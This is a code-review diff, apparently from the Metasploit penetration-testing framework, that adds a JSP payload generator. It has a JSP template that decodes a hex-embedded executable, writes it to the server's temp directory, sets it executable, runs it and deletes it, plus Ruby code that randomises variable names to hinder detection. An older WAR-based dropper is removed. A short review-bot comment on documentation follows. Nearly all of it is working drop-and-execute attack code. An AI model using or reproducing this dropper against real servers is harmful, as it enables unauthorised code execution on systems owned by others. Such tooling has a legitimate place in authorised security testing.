Land #7283, add jsp payload generator
commit
4c4f2e45d6
|
@ -0,0 +1,38 @@
|
||||||
|
<%%@ page import="java.io.*" %%>
|
||||||
|
<%%
|
||||||
|
String %{var_payload} = "%{payload}";
|
||||||
|
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
||||||
|
|
||||||
|
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
|
||||||
|
%{var_exepath} = %{var_exepath}.concat(".exe");
|
||||||
|
}
|
||||||
|
|
||||||
|
int %{var_payloadlength} = %{var_payload}.length();
|
||||||
|
byte[] %{var_bytes} = new byte[%{var_payloadlength}/2];
|
||||||
|
for (int %{var_counter} = 0; %{var_counter} < %{var_payloadlength}; %{var_counter} += 2) {
|
||||||
|
%{var_bytes}[%{var_counter} / 2] = (byte) ((Character.digit(%{var_payload}.charAt(%{var_counter}), 16) << 4)
|
||||||
|
+ Character.digit(%{var_payload}.charAt(%{var_counter}+1), 16));
|
||||||
|
}
|
||||||
|
|
||||||
|
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
||||||
|
%{var_outputstream}.write(%{var_bytes});
|
||||||
|
%{var_outputstream}.flush();
|
||||||
|
%{var_outputstream}.close();
|
||||||
|
|
||||||
|
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
||||||
|
String[] %{var_fperm} = new String[3];
|
||||||
|
%{var_fperm}[0] = "chmod";
|
||||||
|
%{var_fperm}[1] = "+x";
|
||||||
|
%{var_fperm}[2] = %{var_exepath};
|
||||||
|
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
||||||
|
if (%{var_proc}.waitFor() == 0) {
|
||||||
|
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
||||||
|
}
|
||||||
|
|
||||||
|
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
||||||
|
} else {
|
||||||
|
String[] %{var_exepatharray} = new String[1];
|
||||||
|
%{var_exepatharray}[0] = %{var_exepath};
|
||||||
|
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
||||||
|
}
|
||||||
|
%%>
|
|
@ -1,51 +0,0 @@
|
||||||
<%%@ page import="java.io.*" %%>
|
|
||||||
<%%
|
|
||||||
String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
|
|
||||||
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
|
|
||||||
String %{var_data} = "";
|
|
||||||
|
|
||||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
|
|
||||||
{
|
|
||||||
%{var_exepath} = %{var_exepath}.concat(".exe");
|
|
||||||
}
|
|
||||||
|
|
||||||
FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
|
|
||||||
FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
|
|
||||||
|
|
||||||
int %{var_numbytes} = %{var_inputstream}.available();
|
|
||||||
byte %{var_bytearray}[] = new byte[%{var_numbytes}];
|
|
||||||
%{var_inputstream}.read(%{var_bytearray});
|
|
||||||
%{var_inputstream}.close();
|
|
||||||
byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
|
|
||||||
for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
|
|
||||||
{
|
|
||||||
char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
|
|
||||||
char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
|
|
||||||
int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
|
|
||||||
%{var_comb} <<= 4;
|
|
||||||
%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
|
|
||||||
%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
|
|
||||||
}
|
|
||||||
|
|
||||||
%{var_outputstream}.write(%{var_bytes});
|
|
||||||
%{var_outputstream}.close();
|
|
||||||
|
|
||||||
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
|
|
||||||
String[] %{var_fperm} = new String[3];
|
|
||||||
%{var_fperm}[0] = "chmod";
|
|
||||||
%{var_fperm}[1] = "+x";
|
|
||||||
%{var_fperm}[2] = %{var_exepath};
|
|
||||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
|
|
||||||
if (%{var_proc}.waitFor() == 0) {
|
|
||||||
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
|
|
||||||
}
|
|
||||||
|
|
||||||
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
String[] %{var_exepatharray} = new String[1];
|
|
||||||
%{var_exepatharray}[0] = %{var_exepath};
|
|
||||||
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
|
|
||||||
}
|
|
||||||
%%>
|
|
|
@ -1407,6 +1407,40 @@ require 'msf/core/exe/segment_appender'
|
||||||
read_replace_script_template("to_powershell.hta.template", hash_sub)
|
read_replace_script_template("to_powershell.hta.template", hash_sub)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def self.to_jsp(exe)
|
||||||
|
hash_sub = {}
|
||||||
|
hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_payloadlength] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
|
||||||
|
payload_hex = exe.unpack('H*')[0]
|
||||||
|
hash_sub[:payload] = payload_hex
|
||||||
|
|
||||||
|
read_replace_script_template("to_exe.jsp.template", hash_sub)
|
||||||
|
end
|
||||||
|
|
||||||
|
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
|
||||||
|
# payload. The jsp page converts the hexdump back to a normal binary file
|
||||||
|
# and places it in the temp directory. The payload file is then executed.
|
||||||
|
#
|
||||||
|
# @see to_war
|
||||||
|
# @param exe [String] Executable to drop and run.
|
||||||
|
# @param opts (see to_war)
|
||||||
|
# @option opts (see to_war)
|
||||||
|
# @return (see to_war)
|
||||||
|
def self.to_jsp_war(exe, opts = {})
|
||||||
|
template = self.to_jsp(exe)
|
||||||
|
self.to_war(template, opts)
|
||||||
|
end
|
||||||
|
|
||||||
def self.to_win32pe_vbs(framework, code, opts = {})
|
def self.to_win32pe_vbs(framework, code, opts = {})
|
||||||
to_exe_vbs(to_win32pe(framework, code, opts), opts)
|
to_exe_vbs(to_win32pe(framework, code, opts), opts)
|
||||||
end
|
end
|
||||||
|
@ -1500,52 +1534,6 @@ require 'msf/core/exe/segment_appender'
|
||||||
zip.pack
|
zip.pack
|
||||||
end
|
end
|
||||||
|
|
||||||
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a
|
|
||||||
# payload. The jsp page converts the hexdump back to a normal binary file
|
|
||||||
# and places it in the temp directory. The payload file is then executed.
|
|
||||||
#
|
|
||||||
# @see to_war
|
|
||||||
# @param exe [String] Executable to drop and run.
|
|
||||||
# @param opts (see to_war)
|
|
||||||
# @option opts (see to_war)
|
|
||||||
# @return (see to_war)
|
|
||||||
def self.to_jsp_war(exe, opts = {})
|
|
||||||
# begin <payload>.jsp
|
|
||||||
hash_sub = {}
|
|
||||||
hash_sub[:var_hexpath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_data] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_inputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_outputstream] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_numbytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_bytearray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_counter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_char1] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_char2] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_comb] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_exe] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_hexfile] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
||||||
|
|
||||||
# Specify the payload in hex as an extra file..
|
|
||||||
payload_hex = exe.unpack('H*')[0]
|
|
||||||
opts.merge!(
|
|
||||||
{
|
|
||||||
:extra_files =>
|
|
||||||
[
|
|
||||||
[ "#{hash_sub[:var_hexfile]}.txt", payload_hex ]
|
|
||||||
]
|
|
||||||
})
|
|
||||||
|
|
||||||
template = read_replace_script_template("to_exe_jsp.war.template", hash_sub)
|
|
||||||
|
|
||||||
self.to_war(template, opts)
|
|
||||||
end
|
|
||||||
|
|
||||||
# Creates a .NET DLL which loads data into memory
|
# Creates a .NET DLL which loads data into memory
|
||||||
# at a specified location with read/execute permissions
|
# at a specified location with read/execute permissions
|
||||||
# - the data will be loaded at: base+0x2065
|
# - the data will be loaded at: base+0x2065
|
||||||
|
@ -2221,6 +2209,12 @@ require 'msf/core/exe/segment_appender'
|
||||||
when 'loop-vbs'
|
when 'loop-vbs'
|
||||||
exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
|
exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe-small', exeopts)
|
||||||
Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
|
Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
|
||||||
|
when 'jsp'
|
||||||
|
arch ||= [ ARCH_X86 ]
|
||||||
|
tmp_plat = plat.platforms if plat
|
||||||
|
tmp_plat ||= Msf::Module::PlatformList.transform('win')
|
||||||
|
exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, code, exeopts)
|
||||||
|
Msf::Util::EXE.to_jsp(exe)
|
||||||
when 'war'
|
when 'war'
|
||||||
arch ||= [ ARCH_X86 ]
|
arch ||= [ ARCH_X86 ]
|
||||||
tmp_plat = plat.platforms if plat
|
tmp_plat = plat.platforms if plat
|
||||||
|
@ -2258,6 +2252,7 @@ require 'msf/core/exe/segment_appender'
|
||||||
"exe-small",
|
"exe-small",
|
||||||
"hta-psh",
|
"hta-psh",
|
||||||
"jar",
|
"jar",
|
||||||
|
"jsp",
|
||||||
"loop-vbs",
|
"loop-vbs",
|
||||||
"macho",
|
"macho",
|
||||||
"msi",
|
"msi",
|
||||||
|
|
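Review bot: The new `self.to_jsp(exe)` in the `@ -1407` hunk has no doc comment, and the YARD block that moved with `to_jsp_war` still says the WAR contains "a jsp page and hexdump of a payload", which no longer matches the code: the removed version shipped the hex as an `extra_files` entry, whereas the new template receives it inline through `hash_sub[:payload]`. I would put `# Creates a JSP page that embeds the executable as a hex string, writes it to the temp directory and runs it.` and `# @param exe [String] Executable to drop and run.` above `to_jsp`, and reword the `to_jsp_war` summary to say the hex is embedded in the page itself. The return type depends on `read_replace_script_template`, which is not shown in this diff, so any `@return` line should be confirmed against it. As a style point, the eleven identical `Rex::Text.rand_text_alpha(rand(8)+8)` assignments could be built by iterating over a list of the key names.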